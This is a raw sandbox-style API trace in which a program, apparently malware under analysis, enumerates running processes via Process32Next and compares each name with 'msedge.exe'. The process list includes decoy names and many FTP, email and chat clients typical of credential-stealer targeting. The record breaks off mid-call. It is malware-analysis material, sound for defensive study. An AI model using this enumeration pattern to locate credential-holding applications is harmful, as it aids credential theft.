GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.986] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.987] lstrcmpA (lpString1="svchost.exe", lpString2="msedge.exe") returned 1 [0184.988] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.991] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0184.992] lstrcmpA (lpString1="OfficeClickToRun.exe", lpString2="msedge.exe") returned 1 [0184.992] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.992] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0184.993] lstrcmpA (lpString1="taskhostw.exe", lpString2="msedge.exe") returned 1 [0184.994] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.994] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0184.995] lstrcmpA (lpString1="SkypeHost.exe", lpString2="msedge.exe") returned 1 [0184.995] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.995] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0184.996] lstrcmpA (lpString1="ShellExperienceHost.exe", lpString2="msedge.exe") returned 1 [0184.996] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.997] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0184.998] lstrcmpA (lpString1="SearchUI.exe", lpString2="msedge.exe") returned 1 [0184.998] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.998] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0185.150] lstrcmpA (lpString1="svchost.exe", lpString2="msedge.exe") returned 1 [0185.150] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.150] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0185.152] lstrcmpA (lpString1="WmiPrvSE.exe", lpString2="msedge.exe") returned 1 [0185.153] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.153] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0185.155] lstrcmpA (lpString1="WMIADAP.exe", lpString2="msedge.exe") returned 1 [0185.155] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.155] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0185.158] lstrcmpA (lpString1="WmiPrvSE.exe", lpString2="msedge.exe") returned 1 [0185.158] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.158] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0185.160] lstrcmpA (lpString1="iexplore.exe", lpString2="msedge.exe") returned -1 [0185.161] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.161] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="television-room.exe")) returned 1 [0185.162] lstrcmpA (lpString1="television-room.exe", lpString2="msedge.exe") returned 1 [0185.162] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.162] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="thought.exe")) returned 1 [0185.163] lstrcmpA (lpString1="thought.exe", lpString2="msedge.exe") returned 1 [0185.163] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.164] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="full.exe")) returned 1 [0185.164] lstrcmpA (lpString1="full.exe", lpString2="msedge.exe") returned -1 [0185.165] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.165] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-organization.exe")) returned 1 [0185.166] lstrcmpA (lpString1="travel-organization.exe", lpString2="msedge.exe") returned 1 [0185.166] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.166] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="productcasechallenge.exe")) returned 1 [0185.167] lstrcmpA (lpString1="productcasechallenge.exe", lpString2="msedge.exe") returned 1 [0185.168] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.168] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="evidence.exe")) returned 1 [0185.169] lstrcmpA (lpString1="evidence.exe", lpString2="msedge.exe") returned -1 [0185.169] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.169] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="treatment.exe")) returned 1 [0185.171] lstrcmpA (lpString1="treatment.exe", lpString2="msedge.exe") returned 1 [0185.171] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.171] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="couple-great-later.exe")) returned 1 [0185.172] lstrcmpA (lpString1="couple-great-later.exe", lpString2="msedge.exe") returned -1 [0185.173] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.173] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="tree-strategy-into.exe")) returned 1 [0185.174] lstrcmpA (lpString1="tree-strategy-into.exe", lpString2="msedge.exe") returned 1 [0185.174] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.174] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="rather_mother_federal.exe")) returned 1 [0185.175] lstrcmpA (lpString1="rather_mother_federal.exe", lpString2="msedge.exe") returned 1 [0185.175] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.175] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="partnerscene.exe")) returned 1 [0185.176] lstrcmpA (lpString1="partnerscene.exe", lpString2="msedge.exe") returned 1 [0185.177] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.177] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x284, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="color-spend-open.exe")) returned 1 [0185.178] lstrcmpA (lpString1="color-spend-open.exe", lpString2="msedge.exe") returned -1 [0185.179] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.179] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="all_center_project.exe")) returned 1 [0185.180] lstrcmpA (lpString1="all_center_project.exe", lpString2="msedge.exe") returned -1 [0185.180] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.180] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="write.exe")) returned 1 [0185.182] lstrcmpA (lpString1="write.exe", lpString2="msedge.exe") returned 1 [0185.182] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.182] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="large_n't_voice.exe")) returned 1 [0185.183] lstrcmpA (lpString1="large_n't_voice.exe", lpString2="msedge.exe") returned -1 [0185.183] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.183] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="oh_care.exe")) returned 1 [0185.184] lstrcmpA (lpString1="oh_care.exe", lpString2="msedge.exe") returned 1 [0185.184] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.184] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="but example.exe")) returned 1 [0185.454] lstrcmpA (lpString1="but example.exe", lpString2="msedge.exe") returned -1 [0185.454] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.454] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="picturesouth.exe")) returned 1 [0185.455] lstrcmpA (lpString1="picturesouth.exe", lpString2="msedge.exe") returned 1 [0185.455] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.456] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="voteapproachfly.exe")) returned 1 [0185.459] lstrcmpA (lpString1="voteapproachfly.exe", lpString2="msedge.exe") returned 1 [0185.459] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.459] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="camera_from.exe")) returned 1 [0185.461] lstrcmpA (lpString1="camera_from.exe", lpString2="msedge.exe") returned -1 [0185.461] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.461] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0185.463] lstrcmpA (lpString1="3dftp.exe", lpString2="msedge.exe") returned -1 [0185.463] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.464] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0185.465] lstrcmpA (lpString1="absolutetelnet.exe", lpString2="msedge.exe") returned -1 [0185.465] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.465] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0185.467] lstrcmpA (lpString1="alftp.exe", lpString2="msedge.exe") returned -1 [0185.467] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.467] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0185.470] lstrcmpA (lpString1="barca.exe", lpString2="msedge.exe") returned -1 [0185.470] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.470] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0185.471] lstrcmpA (lpString1="bitkinex.exe", lpString2="msedge.exe") returned -1 [0185.472] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.472] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0185.473] lstrcmpA (lpString1="coreftp.exe", lpString2="msedge.exe") returned -1 [0185.473] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.473] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0185.475] lstrcmpA (lpString1="far.exe", lpString2="msedge.exe") returned -1 [0185.475] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.475] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0185.478] lstrcmpA (lpString1="filezilla.exe", lpString2="msedge.exe") returned -1 [0185.478] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.478] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0185.479] lstrcmpA (lpString1="flashfxp.exe", lpString2="msedge.exe") returned -1 [0185.480] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.480] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0185.481] lstrcmpA (lpString1="fling.exe", lpString2="msedge.exe") returned -1 [0185.481] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.481] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1008, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0185.483] lstrcmpA (lpString1="foxmailincmail.exe", lpString2="msedge.exe") returned -1 [0185.483] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.483] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0185.485] lstrcmpA (lpString1="gmailnotifierpro.exe", lpString2="msedge.exe") returned -1 [0185.486] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.486] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0185.487] lstrcmpA (lpString1="icq.exe", lpString2="msedge.exe") returned -1 [0185.488] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.488] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1030, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0185.489] lstrcmpA (lpString1="leechftp.exe", lpString2="msedge.exe") returned -1 [0185.490] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.490] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0185.491] lstrcmpA (lpString1="ncftp.exe", lpString2="msedge.exe") returned 1 [0185.491] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.491] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1044, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0185.659] lstrcmpA (lpString1="notepad.exe", lpString2="msedge.exe") returned 1 [0185.659] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.659] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0185.661] lstrcmpA (lpString1="operamail.exe", lpString2="msedge.exe") returned 1 [0185.661] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.661] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0185.662] lstrcmpA (lpString1="outlook.exe", lpString2="msedge.exe") returned 1 [0185.663] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.663] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0185.676] lstrcmpA (lpString1="pidgin.exe", lpString2="msedge.exe") returned 1 [0185.677] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.677] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0185.678] lstrcmpA (lpString1="scriptftp.exe", lpString2="msedge.exe") returned 1 [0185.679] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.679] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x107c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0185.680] lstrcmpA (lpString1="skype.exe", lpString2="msedge.exe") returned 1 [0185.680] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.680] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0185.682] lstrcmpA (lpString1="smartftp.exe", lpString2="msedge.exe") returned 1 [0185.682] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0185.682] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0185.684] lstrcmpA (lpString1="thunderbird.exe", lpString2="msedge.exe") returned 1 [0185.684] GetProcAddress 